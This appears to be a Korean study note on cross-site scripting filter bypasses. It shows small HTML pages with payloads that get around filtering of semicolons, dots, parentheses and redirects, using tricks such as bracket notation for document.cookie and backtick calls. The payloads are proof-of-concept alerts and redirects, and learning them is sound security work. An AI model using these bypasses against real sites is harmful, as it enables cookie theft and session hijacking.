1. 세미콜론(;)이 필터링될 때
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
<script>
var a = 'a'-alert(1);
</script>
</body>
</html>
2. document.cookie에서 .가 필터링될떄
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
<script>
alert(document['cookie']);
</script>
</body>
</html>
3. location.href로 이동되는 값을 임의로 변조할 때
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
<script>
location.href='https://naver.com' && 'https://daum.net';
</script>
</body>
</html>또한 -를 이용해 alert함수 실행 후 ^1&&을 통해 리다이렉트 가능
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
<script>
location.href='https://naver.com'
-alert(1)^1&&'https://daum.net';
</script>
</body>
</html>
4. ()괄호를 필터링할 경우 (백틱)사용
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <input type="text" value=""; onmouseover=alert(document.domain);""> -->
<script>
alert`XSS`
</script>
</body>
</html>